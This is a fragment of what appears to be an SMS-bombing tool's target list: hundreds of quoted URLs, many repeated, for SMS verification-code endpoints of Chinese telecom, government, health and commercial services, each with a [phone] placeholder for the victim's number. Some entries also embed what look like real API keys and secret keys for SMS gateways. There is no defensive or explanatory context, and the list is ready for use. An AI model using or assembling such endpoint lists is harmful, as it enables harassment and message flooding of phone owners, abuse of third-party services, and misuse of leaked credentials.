"http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi 4A&osLevel=23&phone=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", - "http://gk.huixinyt.com/app1dxxy/index.php/Index/getcode1?1=1&mobile=[phone]&_=1551173567907", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", - "http://koudaitong.com/v2/common/sms/imgcaptcha.jsonp?callback=jQuery1102009139976025888258_1433746978224&captcha_code=7998&_=1433746978226&mobile=[phone]", - "https://ucenter.1haitao.com/vc/mobile/SMSCode.htm?codeType=login&mobile=[phone]&sign=ea7f6860aa40d220409b892397890184", - "https://app.leyou.com.cn/system/sendSms?mobile=[phone]&sign=fb0a624aade8b0e135196025cbc191c2&transtype=reg_m", - "http://www.dgzz1.com:20002/LoginMobileYanZheng?MOBILE=[phone]", - "https://class.hujiang.com/classtopic/handler/phonecaptcha?areaID=87051&phoneNumber=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://secure.changba.com/ktvboxs.php?ac=phonestartentry&curuserid=0&channelsrc=appstore&version=9.1.1&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=78363e2e9ba7642df7b2f474a64b66b7cf7cdfbc&systemversion=12.4&device=iPhone8,1&b", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://doctor.helianhealth.com/api/v3/auth/common/getSMScode?cellphone=[phone]&sign=d821db6c5629ea532b9f8ff95e39e952&smsType=1&timestamp=1568266253&type=1", - "http://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://www.6dspeaker.com/sdspeaker/public?method=getPhoneCode&phone=[phone]&countryCode=%2B86&validateType=1", - "https://cloud.haoyunbang.cn/user/sms/send?mobile=[phone]&appId=ios_15196397349756&t=1565073179646&sign=70723c9c61730237de0b97a02395e103", - "http://passport2.chaoxing.com/num/phonecode?phone=[phone]", - "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw==&phone=[phone]&tag=yhoQ9arXKRk3AqpwPGwklOAb/ghFcjxlx0uZNXuiOhXg6sItA+uIMWLFLQzyVfRCP1db+11CZSVvwzQvNR8xKgpkH2h9VTHRHAPTgHMWw6q5e1SYTdcMB4er6KEEPEDzFU2yJ3N", - "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", - "http://park.chemi.ren//serverpark/index.php/Api/Mobileapi/getCode?phone=[phone]&action=codeLogin&type=sms&client=android&version=2.4", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://qhg.api.nbxuanma.com/api/VerifyCode/Send?Phone=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://iosapi.shixiseng.com/app/telrandcode?sign=6F4C6784400B289D3B0BC2742D704E59&tel=[phone]&time=1564926500.453583&type=reg", - "https://reg.suning.com/srs-web/ajax/code/sms.do?scen=PERSON_MOBILE_REG_VERIFY_MOBILE&uid&code&dfpToken=THrLck1681e2c9a89rGPm639e&detect=mmds_uDjz1jfWoxDDcojxxwoDwgWozujMf1xjggnjkZJwujuDMonJNNojJfZogzMxoxMnW1NDJZjwukndT5UBJ5qL55XxZeNvx5fxAC4055SwwTkl555-xjC-555KxOC.", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://api.yuyin-tv.com/v1/account/verifycode/register?phone=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://api.passport.pptv.com:80/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://photograph.yuanlikj.cn/send/Send?appName=%E6%88%AA%E5%9B%BE%E7%A7%80-%E5%AF%B9%E8%AF%9D%E7%94%9F%E6%88%90%E5%99%A8&TELMobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=1", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://api.1sapp.com/captcha/getSmsCaptcha?GUID=9b079137577015d58e0428cbae5.61417812&OSVersion=12.4&active_method=icon&deviceCode=5C351103-F887-4932-BC59-58C75875EFDE&distinct_id=&dtu=100&lat=29.58959433282935&lon=106.281065329089&network=WIFI&sign=73ffc97fcc0d33c", - "http://server.daiyudianjing.com/User/GetShortMessage?phone=[phone]&type=0&Timestamp=1562547880955&Nonstr=4A4EC434EC1697BAB69253B3293FF032", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://cap.caocaokeji.cn/bps/sendVerifyCode/2.0?appCode=2WZ2JRQR708W&appVersion=4.3.2&buildVersion=192&clientType=1&deviceId=5C351103-F887-4932-BC59-58C75875EFDE&fullVersion=4.3.2.192&isJailBreak=0&mobileType=ios&phone=[phone]&sign=FB3ED4C94F2877A29366F19C4A7CED68", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://www.gangaimall.com/mbb-web/api/account/code?mobile=[phone]&type=0", - "https://doctor.helianhealth.com/api/v3/auth/common/getSMScode?cellphone=[phone]&sign=d821db6c5629ea532b9f8ff95e39e952&smsType=1&timestamp=1568266253&type=1", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://wx01.lecake.com/customer/get-code.html?mobile=[phone]&yzm=148323267", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "https://happy.mail.10086.cn/jsp/cn/club/login/smscode.do?r=0.24631415040371842&usermobile=[phone]", - "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", - "http://my.cnki.net/elibregister/Server.aspx?mobile=[phone]&temp=1551691791466&operatetype=2", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://mobile.icourses.cn/hep-mobile/sword/app/register/getCodeByPhone?callback=jQuery111009421744498287961_1580993309090&phone=1557078659&_=1580993309108", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://v.juhe.cn/sms/send?mobile=[phone]&tpl_id=11115&tpl_value=#code#=321809&key=a68cead9b27523c56ce7fd7fc1312ea4", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "https://cloud.maitao.com/auth/code?cityId=2&uid=&cfbundleversion=5.12.0&imei=32E30496-2A31-463B-A1BD-75B005303E41&channelid=AppStore&devicetoken=69103da60f6eca7a15a995f4f33371ce6413567d5df01d1335f6ab25a47a2f3c&fromapp=1&token=05F452E3F79B7410AC8962C7445483E81AD2ACC", - "https://app.aplum.com/user/sendmsg?fromApp=1&phone=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", - "https://ptlogin.4399.com:443/ptlogin/sendPhoneLoginCode.do?phone=[phone]", - "http://duanxin.diluw.com/index.php?hm=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://www.kaidikeji.com/registerPhoneYzmEx?phone=[phone]", - "https://register.7moor.com/Action?callback=jQuery17202698357481160306_1589614815141&action=register.rl7mWebSiteYZMWebCallTryMobileCode&data=%7B%22mobile%22%3A%22[phone]%22%7D&_=1589614821972", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://zhuikanxs.com/novelapilogin/sendsms?phone=[phone]&idfa=5C351103-F887-4932-BC59-58C75875EFDE&package=sxrqowww.com&version=1.6.9&token=384e798aee87f24f4a228a41df049e27&type=1&timestamp=1567400876&sign=9726d9876bd9e1bbc5667eeadd28e42b", - "https://idecoration.ikongjian.com/user/fetchCode?&deviceId=7676F5C4-1919-4FC8-9436-BBFD5BE87482&mobile=[phone]&type=1&token=YzVkMGVlYWMtZTU4My00MTc2LWJkMzYtZGZlMWRjODgwYjBkZDBiMDg4Y2QxZWZkLTYzZGItNjcxNC0zODVlLWNhZWUwZDVj", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", - "https://papa.51nbapi.com/mobile/app/phoneCheck?phone=[phone]&appName=sujiebaitiao&appChannel=AppStore&appVersion=1.2.0&appDevice=I", - "http://srmemberapp.srgow.com/sys/captcha/[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "https://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", - "https://passport.ziroom.com/verify/code/v2?phone=[phone]&type=1", - "https://secure.changba.com/ktvboxs.php?ac=phonestartentry&curuserid=0&channelsrc=appstore&version=9.1.1&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=78363e2e9ba7642df7b2f474a64b66b7cf7cdfbc&systemversion=12.4&device=iPhone8,1&b", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://passport.bignox.com/sso/o2/sms?method=send_mobile_login_sms&mobile=[phone]&operation=login&request_token=RT-946987-zwaBUfZnSTD2qfrc04fvX9J2Pd7AyN-bignox.com", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://api.botbrain.ai/fish/v1/login/captcha?dt=1578983039143&guid=12739063-4134-3aa6-d867-8a912fce4104&sid=e267b2e5-9134-3aa6-d867-8be4bc4334b7&plt=android&uid=&mobile=%20[phone]&type=bind", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=15", - "http://www.6dspeaker.com/sdspeaker/public?method=getPhoneCode&phone=[phone]&countryCode=%2B86&validateType=1", - "http://i.xfvw.cn/api/sms/send?mobile=[phone]&event=register", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "https://passport.eqxiu.com/eqs/sms/token?phone=[phone]&type=quickLogin&checkPhone=1&channel=21&version=4.4.1", - "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]&comefrom=7&auth=&msgtype=0", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "https://api.intsig.net/user/cs/send_emailsms_with_verify?account=[phone]&account_type=mobile&area_code=86&client_app=CamScanner_IP_FREE%405.12.1.1907311855&device_id=4f06e7989623c84b4c88dddc46724ea2&language=zh-cn&type=login_via_vcode", - "https://m.health.pingan.com:443/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", - "http://wx.airjiangxi.com/html5_jx/main?sourceid=&apptype=&appcode=&developer=&channel=&usertype=&userid=&actionCode=18&type=0&cotentType=1&mobileORemail=[phone]&ffpid=&pidNumber=", - "http://www.easgs.cn/app/index.php?i=8&c=entry&do=sms&m=junsion_winaward_plugin_wap&mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://quan.lukou.com/api/sms/verification_code?phone=[phone]&sign=74F59C2BB6F3830D6EB835FDA7550EB7&t=1564024638", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "https://secure.changba.com/ktvboxs.php?ac=phonestartentry&curuserid=0&channelsrc=appstore&version=9.1.1&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=78363e2e9ba7642df7b2f474a64b66b7cf7cdfbc&systemversion=12.4&device=iPhone8,1&b", - "https://wap.fruitday.com//v3/passport/send_vercode?mobile=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://www.dangaoss.com/h5/acc/send_code?_t=1552475308&sign=424064b2d2d003d83db05380438824cb&username=[phone]", - "http://ketang.ldcstudy.com/nsuser/h5/getCode.vm?phone=[phone]&servicekey=", - "https://iosapi.shixiseng.com/app/telrandcode?sign=6F4C6784400B289D3B0BC2742D704E59&tel=[phone]&time=1564926500.453583&type=reg", - "http://www.txooo.com/Txooo/Main/BusinessRequirement/Ajax/BusinessRequirementAjax.ajax/SendMobileCode?mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://flights.sichuanair.com/3uair/ibe/profile/processSendSMSNew.do?ConversationID=&smsType=REGISTER&mobilePhone=[phone]&verkey=MOBILELOGIN", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://ttq.api.yolanda.hk/api/v5/users/identifying_code.json?address=&app_id=TTQ&app_revision=2.2.2&cellphone_type=iPhone%206s-12.4&login=[phone]&mob_type=1&platform=iphone&send_type=1&systemLaunguage=zh-Hans-CN", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://hbrbapi.hubeidaily.net/amc/client/getAuthCode?mobilephone=[phone]&nodeCode=ecdc5307-888e-4322-8817-f04bd81a7e82", - "http://my.baihe.com/Getinterregist/captchaAndRegCheck?account=[phone]&type=1", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://babyheartapi.ihealthbaby.cn/BabyheartServer/sms/sendMessage?sendType=1&smsType=1&tel=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://mobile.yougou.com/v_1.8/quicklyLoginMobileverify?username=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://www.zkzcfu.cn/api/sms/send?mobile=[phone]&event=register", - "http://iu.snssdk.com/user/mobile/send_code/?iid=80794405933&type=1&mobile=[phone]&ac=WIFI&channel=App%20Store&app_name=joke_zone&aid=27&version_code=2.2.0&device_platform=iphone&os_version=12.4&device_type=iPhone8,1&device_id=68923678300&vid=FFAA4EA8-1E5C-4EA0-9A1E", - "https://helper.2bulu.com/sendValidateCode?p_userId=0&p_productType=0&p_terminalType=2&p_appVersion=6.1.0&mobileNumber=[phone]&unique=1&areaCode=86", - "http://www.zuisgo.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&firewallToken=jkjslfskjk8545sfsdf&uid=&token=&loginTime=&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://www.cshixi.com/api/sendCode?username=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=2", - "http://prod.layadmin.cn/api/message/sendV2?app_id=1&version=1.4.0&channel_id=001&phone=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "https://api.botbrain.ai/fish/v1/login/captcha?dt=1578983039143&guid=12739063-4134-3aa6-d867-8a912fce4104&sid=e267b2e5-9134-3aa6-d867-8be4bc4334b7&plt=android&uid=&mobile=%20[phone]&type=bind", - "http://user.daojia.com/mobile/getcode?mobile=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "https://beacons.gcp.gvt2.com/domainreliability/upload", - "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]&comefrom=7&auth=&msgtype=0", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=9", - "https://pass.hujiang.com/v2/Handler/UCenter?action=SendMsg&imgcode=&token=1e7bbab658a5b65cbc3074d6296a0b9b&sendtype=register&msgtype=1&captchaVersion=2&user_domain=hj&business_domain=&hpuid=P0S4wETf4noqmS29L5650&callback=reqwest_1546707722757024049&mobile=%2B86-[ph", - "https://masterhands.yladm.com/user/phone/verifycode?app=gaoshou_i&brand=apple&idfa=5C351103-F887-4932-BC59-58C75875EFDE&model=iphone&phone=[phone]&refer=hometabpage&sid=appstore&sign=dfe50ccd14bb2c905e37b4706c5e633c&tcid=5f401e59cddf4345a511010d2c268592&timestamp=1", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://apis.changbalive.com/apis.php?ac=registerwithphone&curuserid=&channelsrc=appstore&version=3.0.2&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=e77c9aae3b3d1994fdb56947e974fc21fcf20f99&systemversion=12.4&device=iPhone8,1&b", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://passport2.chaoxing.com/num/phonecode?phone=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", - "http://api.fine3q.com/link-site/api/user/get_verification_code.json?ts=1561901787148&c_id=1&p=a&d_id=861913032338784&ver=3.1.5&mobile=[phone]", - "http://www.gkbbapp.com/Support/JsonNews.aspx?sendShortMessage=yes&Telephone=[phone]", - "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", - "http://www.easgs.cn/app/index.php?i=8&c=entry&do=sms&m=junsion_winaward_plugin_wap&mobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", - "http://jyw.vhujao.cn/m/reg/motregchk.php?mob=[phone]", - "http://puser.funshion.com/user/sendappsmscodenocaptcha?app=main&app_code=iphone&cl=iphone&content=%E6%82%A8%E7%9A%84%E7%9F%AD%E4%BF%A1%E9%AA%8C%E8%AF%81%E7%A0%81%E6%98%AF%3A%25verifycode%25%E3%80%82%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E5%8F%B7%E6%AD%A3%E5%9C%A8%E4%", - "http://www.fvv678.cn/app/user/checkMobileReg?mobile=[phone]&token=0&timestamp=1558355544&sign=c906bc234a2b4ac71ed23cae0147092b", - "http://newm.yktour.com.cn/api/captcha/login/info/get?mobile=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://www.yundaipay.com/index/user/getMsgCode?username=[phone]", - "http://m.jianshe99.com/m_member/member/mobile_register/resendMsg.shtm?jsonpCallback=&_=&mobilePhone=[phone]", - "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]&_=1570683350704", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://m.api.cetv.cn/v2/member?app_version=2.1.0&sign=f631db0bcb5fabc1b76679d9480e4f73&device_id=74:4A:A4:A6:B0:63&time=1561078945566&mobile=[phone]&system_name=android&ip=192.168.43.217&siteid=10001&clientid=1&modules=needcaptcha:1&type=android", - "http://app.zangcun.com/registerCode?mobile=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://i.xfvw.cn/api/sms/send?mobile=[phone]", - "http://www.newtank.cn/newtank/act/sendCaptcha.do?activityId=161&channelId=15399&_d=1506594279964&mobile=[phone]&_=1551173567874", - "https://id.ifeng.com/api/simplesendmsg?comefrom=38&msgtype=0&auth=&mobile=[phone]", - "https://ubas.360jie.com.cn/ubas/event/report?flowNo=49181563973602947&bizCode=REGISTER_LOGIN&eventCode=SEND_SMSCODE&pageName=login.html&ABTest=A&TuanABTest=A&userOprTime=1563973631831&hostApp=APP&sourceType=APK&channelSource=CH_001_IOS&subChannel=&activityInfo=&utm", - "http://www.sbsq.aliwe.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://api9000.chengqinhr.xyz/app/getQmjzSms/[phone]?appid=com.qgjz.ptjz", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]", - "http://sms.bechtech.cn/Api/send/data/json?accesskey=1730&secretkey=3f198068c6b5c1036f9b38ae0690cc244695a247&mobile=[phone]&content=%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E9%AA%8C%E8%AF%81%E7%A0%81%E4%B8%BA%EF%BC%9A3973+%EF%BC%8C%E8%AF%A5%E9%AA%8C%E8%AF%81%E7%A0%8110%", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://client.cangshuyuedu.com/api/Sys/SendSmsAuthCode?callback=jQuery111009421744498287961_1580993309090&pType=4&app_version=2.0.7&pkgname=com.yokong.bookfree&channel_id=1&device_id=f75c53c90f4a6635d5f6c7136120154d&mob=[phone]&platform=IOS&uid=0&token=bfd31758556", - "http://www.lecake.com/customer/get-code.html?yzm=10000&mobile=[phone]&_=1551173567939", - "http://www.henhuoapp.com/api/method/getCode?phone=[phone]&type=1", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=3", - "https://ddxq.mobi/api/v1/user/mobile/check/?api_version=8.30.2&app_client_id=1&channel=App%20Store&countryCode=CN&device_id=a3bd2adebf3a389bb044fea62d52c8c55a1577ce&device_model=iPhone8%2C1&device_name=iPhone%206s&languageCode=zh&latitude=29.587192&localeIdentifier", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=5", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=1", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]", - "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "https://webapi.account.mihoyo.com/Api/create_mobile_captcha?action_ticket=&action_type=regist&mobile=[phone]", - "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]&_=1535534872440", - "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", - "https://nhapi02.tv189.com/cpms/Internet?appid=111010310225&phone=[phone]&cliver=1.32.1.6&idfa=5C351103-F887-4932-BC59-58C75875EFDE&NetType=WIFI&channelID=01834721&type=register&iosid=ccb2ffcb0bc0a5b42678ac61fed3372bed1ce69a&token=b1fa0dc43dc3ed1b9c4d9cb5f5e57529&pc", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://sms.bechtech.cn/Api/send/data/json?accesskey=1730&secretkey=3f198068c6b5c1036f9b38ae0690cc244695a247&mobile=[phone]&content=%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E9%AA%8C%E8%AF%81%E7%A0%81%E4%B8%BA%EF%BC%9A3973+%EF%BC%8C%E8%AF%A5%E9%AA%8C%E8%AF%81%E7%A0%8110%", - 